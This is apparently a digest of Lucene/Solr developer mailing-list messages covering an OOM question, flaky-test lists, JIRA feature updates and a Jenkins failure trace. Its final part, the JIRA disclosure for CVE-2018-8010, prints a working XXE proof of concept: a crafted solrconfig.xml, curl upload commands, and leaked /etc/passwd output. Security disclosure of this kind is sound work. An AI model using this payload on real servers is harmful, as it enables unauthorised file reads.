I have a collection (the news_archive collection) which contains 30 million 
documents. This collection is divided into 3 shards, each of which contains 10 
million documents and occupies 100 GB on disk. Each of the shards has 3 
replicas.

Each of the cluster nodes contains one of the replicas of each shard. In fact, 
the nodes are identical, i.e.:

node1 contains:
shard1_replica1
shard2_replica1
shard3_replica1
node2 contains:
shard1_replica2
shard2_replica2
shard3_replica2
node3 contains:
shard1_replica3
shard2_replica3
shard3_replica3

Problem description:


When I run a heavy facet query, 
such as 
http://Node1IP:/solr/news_archive/select?q=*:*&fq=pubDate:[2018-1-18T12:06:57Z%20TO%202018-4-18T12:06:57Z]&facet.field=ngram_content&facet=true&facet.mincount=1&facet.limit=2000&rows=0&wt=json,
 the Solr instances are killed by the OOM killer on almost all of the nodes.
I found the below log in 
solr/logs/solr_oom_killer--2018-05-21_19_17_41.log on each of the Solr 
instances:

"Running OOM killer script for process 2766 for Solr on port 
Killed process 2766"


It seems that the query is routed to different nodes of the cluster, and given 
the exhaustive memory use caused by the query, the Solr instances are killed 
by the OOM killer.

 

Regardless of how memory-demanding the query is, I think the cluster's nodes 
should be protected from being killed by any read query,

for example by limiting the amount of memory that can be used by any query.






Re: BadApple candidates

2018-05-21 Thread Alan Woodward
When did TestLRUQueryCache fail?  I haven’t seen that one.

> On 21 May 2018, at 16:00, Erick Erickson  wrote:
> 
> I'm going to change how I collect the BadApple candidates. After
> getting a little
> overwhelmed by the number of failure e-mails (even ignoring the ones with
> BadApple enabled), "It come to me in a vision! In a flash!" (points if you
> know where that comes from, hint: old music involving a pickle).
> 
> Since I collect failures for a week and then filter them by what's
> also in Hoss's
> results from two weeks ago, that's really equivalent to creating the 
> candidate
> list from the intersection of the most recent week of Hoss's results and the
> results from _three_ weeks ago. Much faster too. Thanks Hoss!
> 
> So that's what I'll do going forward.
> 
> Meanwhile, here's the list for this Thursday.
> 
> BadApple candidates: I'll BadApple these on Thursday unless there are 
> objections
> org.apache.lucene.search.TestLRUQueryCache.testBulkScorerLocking
>  org.apache.solr.TestDistributedSearch.test
>  org.apache.solr.cloud.AddReplicaTest.test
>  org.apache.solr.cloud.AssignBackwardCompatibilityTest.test
>  org.apache.solr.cloud.CreateRoutedAliasTest.testCollectionNamesMustBeAbsent
>  org.apache.solr.cloud.CreateRoutedAliasTest.testTimezoneAbsoluteDate
>  org.apache.solr.cloud.CreateRoutedAliasTest.testV1
>  org.apache.solr.cloud.CreateRoutedAliasTest.testV2
>  
> org.apache.solr.cloud.DeleteReplicaTest.raceConditionOnDeleteAndRegisterReplica
>  org.apache.solr.cloud.LIRRollingUpdatesTest.testNewReplicaOldLeader
>  org.apache.solr.cloud.LeaderVoteWaitTimeoutTest.basicTest
>  
> org.apache.solr.cloud.LeaderVoteWaitTimeoutTest.testMostInSyncReplicasCanWinElection
>  org.apache.solr.cloud.MoveReplicaHDFSTest.testFailedMove
>  org.apache.solr.cloud.RestartWhileUpdatingTest.test
>  
> org.apache.solr.cloud.TestCloudConsistency.testOutOfSyncReplicasCannotBecomeLeader
>  org.apache.solr.cloud.TestPullReplica.testCreateDelete
>  org.apache.solr.cloud.TestPullReplica.testKillLeader
>  org.apache.solr.cloud.TestSolrCloudWithKerberosAlt.testBasics
>  org.apache.solr.cloud.UnloadDistributedZkTest.test
>  
> org.apache.solr.cloud.api.collections.CollectionsAPIAsyncDistributedZkTest.testAsyncRequests
>  
> org.apache.solr.cloud.api.collections.CustomCollectionTest.testCustomCollectionsAPI
>  org.apache.solr.cloud.autoscaling.ComputePlanActionTest.testNodeLost
>  org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testMergeIntegration
>  org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testSplitIntegration
>  org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger
>  org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState
>  
> org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testBelowSearchRate
>  
> org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testDeleteNode
>  org.apache.solr.cloud.autoscaling.SearchRateTriggerTest.testTrigger
>  org.apache.solr.cloud.hdfs.HdfsUnloadDistributedZkTest.test
>  org.apache.solr.cloud.hdfs.StressHdfsTest.test
>  org.apache.solr.handler.TestSQLHandler.doTest
>  org.apache.solr.security.BasicAuthIntegrationTest.testBasicAuth
>  org.apache.solr.uninverting.TestDocTermOrds.testTriggerUnInvertLimit
>  org.apache.solr.update.TestHdfsUpdateLog.testFSThreadSafety
>  org.apache.solr.update.TestInPlaceUpdatesDistrib.test
> 
> 
> Number of AwaitsFix: 21 Number of BadApples: 99
> 
> *AwaitsFix Annotations:
> 
> 
> Lucene AwaitsFix
> GeoPolygonTest.java
>  testLUCENE8276_case3()
>  //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8276")
> 
> GeoPolygonTest.java
>  testLUCENE8280()
>  //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8280")
> 
> GeoPolygonTest.java
>  testLUCENE8281()
>  //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281")
> 
> RandomGeoPolygonTest.java
>  testCompareBigPolygons()
>  //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281")
> 
> RandomGeoPolygonTest.java
>  testCompareSmallPolygons()
>  //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281")
> 
> TestControlledRealTimeReopenThread.java
>  testCRTReopen()
>  @AwaitsFix(bugUrl = "https://issues.apache.org/jira/browse/LUCENE-5737")
> 
> TestICUNormalizer2CharFilter.java
>  testRandomStrings()
>  @AwaitsFix(bugUrl = "https://issues.apache.org/jira/browse/LUCENE-5595")
> 
> TestICUTokenizerCJK.java
>  TestICUTokenizerCJK suite
>  @AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8222")
> 
> TestMoreLikeThis.java
>  testMultiFieldShouldReturnPerFieldBooleanQuery()
>  @AwaitsFix(bugUrl = "https://issues.apache.org/jira/browse/LUCENE-7161")
> 
> UIMABaseAnalyzerTest.java
>  testRandomStrings()
>  @Test @AwaitsFix(bugUrl =
> "https://issues.apache.org/jira/browse/LUCENE-3869")
> 
> UIMABaseAnalyzerTest.java
>  testRandomStringsWithConfigurationParameters()
>  @Test @AwaitsFix(bugUrl =
> "https://issue

[jira] [Commented] (SOLR-9480) Graph Traversal for Significantly Related Terms (Semantic Knowledge Graph)

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-9480?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482696#comment-16482696
 ] 

ASF subversion and git services commented on SOLR-9480:
---

Commit f0d6a0e638b13ddf4f5acfffdcd390e977572b67 in lucene-solr's branch 
refs/heads/branch_7x from Chris Hostetter
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=f0d6a0e ]

SOLR-9480: A new 'relatedness()' aggregate function for JSON Faceting to enable 
building Semantic Knowledge Graphs

(cherry picked from commit 669b9e7a5343c625e265a075c9dbf24fcbff7363)


> Graph Traversal for Significantly Related Terms (Semantic Knowledge Graph)
> --
>
> Key: SOLR-9480
> URL: https://issues.apache.org/jira/browse/SOLR-9480
> Project: Solr
>  Issue Type: Improvement
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: Trey Grainger
>Assignee: Hoss Man
>Priority: Major
> Attachments: SOLR-9480.patch, SOLR-9480.patch, SOLR-9480.patch, 
> SOLR-9480.patch, SOLR-9480.patch, SOLR-9480.patch
>
>
> This issue is to track the contribution of the Semantic Knowledge Graph Solr 
> Plugin (request handler), which exposes a graph-like interface for 
> discovering and traversing significant relationships between entities within 
> an inverted index.
> This data model has been described in the following research paper: [The 
> Semantic Knowledge Graph: A compact, auto-generated model for real-time 
> traversal and ranking of any relationship within a 
> domain|https://arxiv.org/abs/1609.00464], as well as in presentations I gave 
> in October 2015 at [Lucene/Solr 
> Revolution|http://www.slideshare.net/treygrainger/leveraging-lucenesolr-as-a-knowledge-graph-and-intent-engine]
>  and November 2015 at the [Bay Area Search 
> Meetup|http://www.treygrainger.com/posts/presentations/searching-on-intent-knowledge-graphs-personalization-and-contextual-disambiguation/].
> The source code for this project is currently available at 
> [https://github.com/careerbuilder/semantic-knowledge-graph], and the folks at 
> CareerBuilder (where this was built) have given me the go-ahead to now 
> contribute this back to the Apache Solr Project, as well.
> Check out the Github repository, research paper, or presentations for a more 
> detailed description of this contribution. Initial patch coming soon.






[jira] [Commented] (SOLR-12376) New TaggerRequestHandler (aka SolrTextTagger)

2018-05-21 Thread David Smiley (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12376?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482693#comment-16482693
 ] 

David Smiley commented on SOLR-12376:
-

Updated patch that passes precommit; there were some little things addressed 
with this.

TODO docs.

> New TaggerRequestHandler (aka SolrTextTagger)
> -
>
> Key: SOLR-12376
> URL: https://issues.apache.org/jira/browse/SOLR-12376
> Project: Solr
>  Issue Type: New Feature
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: David Smiley
>Assignee: David Smiley
>Priority: Major
> Fix For: 7.4
>
> Attachments: SOLR-12376.patch, SOLR-12376.patch
>
>
> This issue introduces a new RequestHandler: {{TaggerRequestHandler}}, AKA the 
> SolrTextTagger from the OpenSextant project 
> [https://github.com/OpenSextant/SolrTextTagger]. It's used for named entity 
> recognition (NER) of text passed to it. It doesn't do any NLP (outside of 
> Lucene text analysis), so it's said to be a "naive tagger", but it's 
> definitely useful as-is and a more complete NER or ERD (entity recognition 
> and disambiguation) system can be built with this as a key component. The 
> SolrTextTagger has been used on queries for query-understanding, and it's 
> been used on full-text, and it's been used on dictionaries that number tens 
> of millions in size. Since it's small and has been used a bunch (including 
> helping win an ERD competition and in [Apache 
> Stanbol|https://stanbol.apache.org/]), several people have asked me when or 
> why isn't this in Solr yet. So here it is.
> To use it, first you need a collection of documents that have a name-like 
> field (short text) indexed with the ConcatenateFilter (LUCENE-8323) at the 
> end. We call this the dictionary. Once that's in place, you simply post text 
> to a {{TaggerRequestHandler}} and it returns the offset pairs into that text 
> for matches in the dictionary along with the uniqueKey of the matching 
> documents. It can also return other document data desired. That's the gist; 
> I'll add more details on use to the Solr Reference Guide.
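As a toy illustration of the "naive tagging" idea described above, a from-scratch dictionary tagger that reports offset pairs might look like the following. This is a hypothetical in-memory sketch, not the TaggerRequestHandler's actual code, which matches against an inverted index:

```java
import java.util.ArrayList;
import java.util.Collection;
import java.util.HashSet;
import java.util.List;
import java.util.Set;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Toy sketch of naive dictionary tagging: find the longest case-insensitive
// dictionary phrase starting at each token and report its [start, end)
// character offsets -- the same input/output contract the handler exposes
// (offset pairs into the posted text for each dictionary match).
class NaiveTagger {
    private final Set<String> dictionary = new HashSet<>();
    private int maxWords = 1;

    NaiveTagger(Collection<String> names) {
        for (String name : names) {
            dictionary.add(name.toLowerCase());
            maxWords = Math.max(maxWords, name.trim().split("\\s+").length);
        }
    }

    // Returns {startOffset, endOffset} pairs into the original text.
    List<int[]> tag(String text) {
        // Record the start/end offset of every whitespace-delimited token.
        List<int[]> tokens = new ArrayList<>();
        Matcher m = Pattern.compile("\\S+").matcher(text);
        while (m.find()) {
            tokens.add(new int[] {m.start(), m.end()});
        }
        List<int[]> tags = new ArrayList<>();
        for (int i = 0; i < tokens.size(); i++) {
            // Prefer the longest phrase starting at token i.
            for (int len = Math.min(maxWords, tokens.size() - i); len >= 1; len--) {
                int start = tokens.get(i)[0];
                int end = tokens.get(i + len - 1)[1];
                if (dictionary.contains(text.substring(start, end).toLowerCase())) {
                    tags.add(new int[] {start, end});
                    i += len - 1; // don't re-tag inside the matched phrase
                    break;
                }
            }
        }
        return tags;
    }
}
```

For example, with a dictionary of {"New York", "York"}, tagging "I love New York" reports a single, longest match over "New York" rather than a nested match on "York".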






[jira] [Updated] (SOLR-12376) New TaggerRequestHandler (aka SolrTextTagger)

2018-05-21 Thread David Smiley (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12376?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

David Smiley updated SOLR-12376:

Attachment: SOLR-12376.patch

> New TaggerRequestHandler (aka SolrTextTagger)
> -
>
> Key: SOLR-12376
> URL: https://issues.apache.org/jira/browse/SOLR-12376
> Project: Solr
>  Issue Type: New Feature
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: David Smiley
>Assignee: David Smiley
>Priority: Major
> Fix For: 7.4
>
> Attachments: SOLR-12376.patch, SOLR-12376.patch
>
>
> This issue introduces a new RequestHandler: {{TaggerRequestHandler}}, AKA the 
> SolrTextTagger from the OpenSextant project 
> [https://github.com/OpenSextant/SolrTextTagger]. It's used for named entity 
> recognition (NER) of text passed to it. It doesn't do any NLP (outside of 
> Lucene text analysis), so it's said to be a "naive tagger", but it's 
> definitely useful as-is and a more complete NER or ERD (entity recognition 
> and disambiguation) system can be built with this as a key component. The 
> SolrTextTagger has been used on queries for query-understanding, and it's 
> been used on full-text, and it's been used on dictionaries that number tens 
> of millions in size. Since it's small and has been used a bunch (including 
> helping win an ERD competition and in [Apache 
> Stanbol|https://stanbol.apache.org/]), several people have asked me when or 
> why isn't this in Solr yet. So here it is.
> To use it, first you need a collection of documents that have a name-like 
> field (short text) indexed with the ConcatenateFilter (LUCENE-8323) at the 
> end. We call this the dictionary. Once that's in place, you simply post text 
> to a {{TaggerRequestHandler}} and it returns the offset pairs into that text 
> for matches in the dictionary along with the uniqueKey of the matching 
> documents. It can also return other document data desired. That's the gist; 
> I'll add more details on use to the Solr Reference Guide.






[JENKINS] Lucene-Solr-master-Solaris (64bit/jdk1.8.0) - Build # 1882 - Still Unstable!

2018-05-21 Thread Policeman Jenkins Server
Build: https://jenkins.thetaphi.de/job/Lucene-Solr-master-Solaris/1882/
Java: 64bit/jdk1.8.0 -XX:+UseCompressedOops -XX:+UseG1GC

7 tests failed.
FAILED:  org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger

Error Message:
should have fired an event

Stack Trace:
java.lang.AssertionError: should have fired an event
at 
__randomizedtesting.SeedInfo.seed([24783940B4488C36:47B30FC22D87FF1B]:0)
at org.junit.Assert.fail(Assert.java:93)
at org.junit.Assert.assertTrue(Assert.java:43)
at org.junit.Assert.assertNotNull(Assert.java:526)
at 
org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger(IndexSizeTriggerTest.java:184)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleStoreClassName$1.evaluate(TestRuleStoreClassName.java:41)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleAssertionsRequired$1.evaluate(TestRuleAssertionsRequired.java:53)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleIgnoreTestSuites$1.evaluate(TestRuleIgnoreTestSuites.java:54)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at java.lang.Thread.run(Thread.java:748)


FAILED:  org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger

Error Message:
should have fired an event

Stack Trace:
java.lang.AssertionError: should have fired an event
at 
__randomizedtesting.SeedInfo.seed(

[jira] [Created] (SOLR-12380) Support CDCR operation in the implicit routing mode cluster

2018-05-21 Thread Atita Arora (JIRA)
Atita Arora created SOLR-12380:
--

 Summary: Support CDCR operation in the implicit routing mode 
cluster
 Key: SOLR-12380
 URL: https://issues.apache.org/jira/browse/SOLR-12380
 Project: Solr
  Issue Type: Bug
  Security Level: Public (Default Security Level. Issues are Public)
  Components: CDCR
Reporter: Atita Arora
 Attachments: Gmail - CDCR setup with Custom Document Routing.pdf

Would like to explore whether we can fix CDCR in the custom document / implicit 
routing mode cluster.

 

Attaching mail for reference.






[jira] [Commented] (LUCENE-8319) A Time-limiting collector that works with CollectorManagers

2018-05-21 Thread Michael McCandless (JIRA)

[ 
https://issues.apache.org/jira/browse/LUCENE-8319?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482649#comment-16482649
 ] 

Michael McCandless commented on LUCENE-8319:


{quote}I wonder if we could have TimeExceeededException extend 
CollectionTerminatedException 
{quote}
I think that's a good approach?  They both extend {{RuntimeException}} today.  
And then we could add a getter on {{TimeLimitingCollector}} to see if a timeout 
occurred.
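In plain Java, the combination being discussed can be sketched like this. The classes below are illustrative stand-ins, not Lucene's actual implementations:

```java
// Illustrative sketch only -- stand-ins for the real Lucene classes. Making
// the timeout exception extend the early-termination exception means any
// caller that already swallows early termination (as IndexSearcher does per
// leaf slice) also tolerates timeouts; the flag getter lets callers tell a
// partial result from a complete one.
class CollectionTerminatedException extends RuntimeException {}

class TimeExceededException extends CollectionTerminatedException {}

class TimeLimitedCollection {
    private final long deadlineNanos;
    private volatile boolean timedOut = false;

    TimeLimitedCollection(long budgetMillis) {
        this.deadlineNanos = System.nanoTime() + budgetMillis * 1_000_000L;
    }

    // Called per collected hit; aborts collection once the budget is spent.
    void collect(int doc) {
        if (System.nanoTime() > deadlineNanos) {
            timedOut = true;
            throw new TimeExceededException(); // swallowed like early termination
        }
        // ... forward the hit to the wrapped collector here ...
    }

    // The getter proposed above: did we stop early with partial results?
    boolean hasTimedOut() {
        return timedOut;
    }
}
```

Because `TimeExceededException` is-a `CollectionTerminatedException`, a searcher that catches and ignores the latter needs no changes, and reduce() can still run over whatever slices completed.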

> A Time-limiting collector that works with CollectorManagers
> ---
>
> Key: LUCENE-8319
> URL: https://issues.apache.org/jira/browse/LUCENE-8319
> Project: Lucene - Core
>  Issue Type: Improvement
>  Components: core/search
>Reporter: Tony Xu
>Priority: Minor
>
> Currently Lucene has *TimeLimitingCollector* to support time-bound collection 
> and it will throw 
> *TimeExceededException* if a timeout happens. This only works nicely with the 
> single-threaded low-level API from the IndexSearcher. The method signature is --
> *void search(List<LeafReaderContext> leaves, Weight weight, Collector 
> collector)*
> The intended use is to always enclose the searcher.search(query, collector) 
> call with a try ... catch and handle the timeout exception. Unfortunately 
> when working with a *CollectorManager* in the multi-thread search context, 
> the *TimeExceededException* thrown during collecting one leaf slice will be 
> re-thrown by *IndexSearcher* without calling *CollectorManager*'s reduce(), 
> even if other slices are successfully collected. The signature 
> of the search api with *CollectorManager* is --
> *<C extends Collector, T> T search(Query query, CollectorManager<C, T> 
> collectorManager)*
>  
> The good news is that IndexSearcher handles *CollectionTerminatedException* 
> gracefully by ignoring it. We can either wrap TimeLimitingCollector and throw 
>  *CollectionTerminatedException* when timeout happens or simply replace 
> *TimeExceededException* with *CollectionTerminatedException*. In either way, 
> we also need to maintain a flag that indicates if timeout occurred so that 
> the user know it's a partial collection.
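The proposal can be sketched in plain Java. This is a simplified stand-in, not the actual Lucene classes; the name TimeLimitingLeafCollector and its shape are illustrative only:

```java
// Sketch of the proposed fix: the timeout exception extends
// CollectionTerminatedException, so a searcher that already swallows
// CollectionTerminatedException per leaf slice keeps going and still calls
// reduce(), while a flag records that the results are partial.
// These are simplified stand-ins, NOT the real Lucene types.
class CollectionTerminatedException extends RuntimeException {}

class TimeExceededException extends CollectionTerminatedException {}

class TimeLimitingLeafCollector {
    private final long deadlineMillis;
    private boolean timedOut = false;

    TimeLimitingLeafCollector(long budgetMillis) {
        this.deadlineMillis = System.currentTimeMillis() + budgetMillis;
    }

    // Called once per matching doc; aborts collection of this leaf on timeout.
    void collect(int doc) {
        if (System.currentTimeMillis() > deadlineMillis) {
            timedOut = true;
            throw new TimeExceededException();
        }
        // ... record the hit ...
    }

    boolean timedOut() { return timedOut; }
}

public class TimeoutSketch {
    public static void main(String[] args) {
        // A budget of -1 ms is already expired, so the first collect() times out.
        TimeLimitingLeafCollector leaf = new TimeLimitingLeafCollector(-1);
        try {
            leaf.collect(0);
        } catch (CollectionTerminatedException e) {
            // A searcher would swallow this, finish other slices, then reduce().
        }
        System.out.println(leaf.timedOut()); // prints "true"
    }
}
```

A caller would check the flag after reduce() to know that the hit counts are only a lower bound.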



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-12316) CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)

2018-05-21 Thread Uwe Schindler (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12316?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482622#comment-16482622
 ] 

Uwe Schindler commented on SOLR-12316:
--

In addition, there are several ways to upload files, e.g. through the admin 
interface.

> CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)
> -
>
> Key: SOLR-12316
> URL: https://issues.apache.org/jira/browse/SOLR-12316
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: config-api, Schema and Analysis, Server
>Affects Versions: 5.5.5, 6.6.3, 7.3
>Reporter: Ishan Chattopadhyaya
>Assignee: Uwe Schindler
>Priority: Blocker
>  Labels: security
> Fix For: 6.6.4, 7.4, master (8.0), 7.3.1
>
> Attachments: SOLR-12316-testfix.patch, SOLR-12316.patch, 
> SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, 
> solr.log
>
>
> While trying to work around the issue of being unable to upload large files 
> to ZK (without jute.maxbuffer setting), [~antz] brought to my notice that he 
> was able to successfully achieve that using XXE. That alarmed me! Our 
> managed-schema and solrconfig.xml parse XXEs!
> Here's a very nasty attack I could execute using this and configset upload 
> functionality:
> Step 1: Create a configset with just two files in a directory called 
> "minimal":
> schema.xml:
> {code}
> 
>   
>   
> 
> {code}
> solrconfig.xml
> {code}
> <!DOCTYPE config [
>   <!ENTITY passwdFile SYSTEM "file:///etc/passwd">
> ]>
> <config>
>   <dataDir>${solr.data.dir:}</dataDir>
>   <directoryFactory name="DirectoryFactory"
>       class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/>
>   <luceneMatchVersion>7.3.0</luceneMatchVersion>
>   <updateHandler class="solr.DirectUpdateHandler2">
>     <commitWithin>
>       <softCommit>${solr.commitwithin.softcommit:true}</softCommit>
>     </commitWithin>
>   </updateHandler>
>   <requestHandler name="/select" class="solr.SearchHandler">
>     <lst name="defaults">
>       <str name="echoParams">explicit</str>
>       <str name="indent">true</str>
>       <str name="df">text</str>
>       <str name="password">&passwdFile;</str>
>     </lst>
>   </requestHandler>
> </config>
> {code}
> Step 2: Upload the minimal directory to Solr using configset upload API:
> {code}
> [ishan@x260 solr] $ (cd minimal && zip -r - *) | curl -X POST --header 
> "Content-Type:application/octet-stream" --data-binary @- 
> "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=mybadconfigset";
>   adding: schema.xml (deflated 42%)
>   adding: solrconfig.xml (deflated 50%)
> {
>   "responseHeader":{
> "status":0,
> "QTime":23}}
> {code}
> Step 3: Create a collection using this configset
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/admin/collections?action=CREATE&name=mybadcoll&numShards=1&collection.configName=mybadconfigset";
> {
>   "responseHeader":{
> "status":0,
> "QTime":3431},
>   "success":{
> "192.168.1.6:8983_solr":{
>   "responseHeader":{
> "status":0,
> "QTime":2062},
>   "core":"mybadcoll_shard1_replica_n1"}}}
> {code}
> Step 4: Use Config API to check the select handler's config. The file is 
> revealed!
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/mybadcoll/config/requestHandler";|jq
>   % Total% Received % Xferd  Average Speed   TimeTime Time  
> Current
>  Dload  Upload   Total   SpentLeft  Speed
> 100  7939  100  79390 0   7939  0  0:00:01 --:--:--  0:00:01  323k
> {
>   "responseHeader": {
> "status": 0,
> "QTime": 16
>   },
>   "config": {
> "requestHandler": {
>   "/select": {
> "name": "/select",
> "class": "solr.SearchHandler",
> "defaults": {
>   "echoParams": "explicit",
>   "indent": "true",
>   "df": "text",
>   "password": 
> "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\nftp:x:14:50:FTP
>  
> User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\nsystemd-timesync:x:999:998:systemd
>  Time Synchronization:/:/sbin/nologin\nsystemd-network:x:192:192:systemd 
> Network Management:/:/sbin/nologin\nsystemd-resolve:x:193:193:systemd 
> Resolver:/:/sbin/nologin\ndbus:x:81:81:System message 
> bus:/:/sbin/nologin\npolkitd:x:998:997:User for 
> polkitd:/:/sbin/nologin\ngeoclue:x:997:996:User for 
> geoclue:/var/lib/geoclue:/sbin/nologin\nrtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin\npulse:x:171:171:PulseAudio
>  System Daemon:/var/run/pulse:/sbin/nologin\navahi:x:70:70:Avahi mDNS/DNS-SD 
> Stack:/var/run/avahi-daemon:/sbin/nologin\nchrony:x:996:992::/var/lib/chrony:/sbin/nologin\nrpc:x:32:32:Rpcbind
>  Daemon:/var/lib/rpcbind:/sbin/nologin\nusbmuxd:x:113:113:usbmuxd 
>
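For reference, the generic JAXP hardening against this class of XXE (not necessarily the exact change made in Solr's patch for this issue) is to disallow DOCTYPE declarations entirely when parsing configuration XML; a minimal sketch:

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.SAXParseException;

public class XxeHardeningSketch {
    // Builds a DocumentBuilderFactory that rejects any DOCTYPE declaration,
    // which blocks external-entity payloads like the &passwdFile; trick above.
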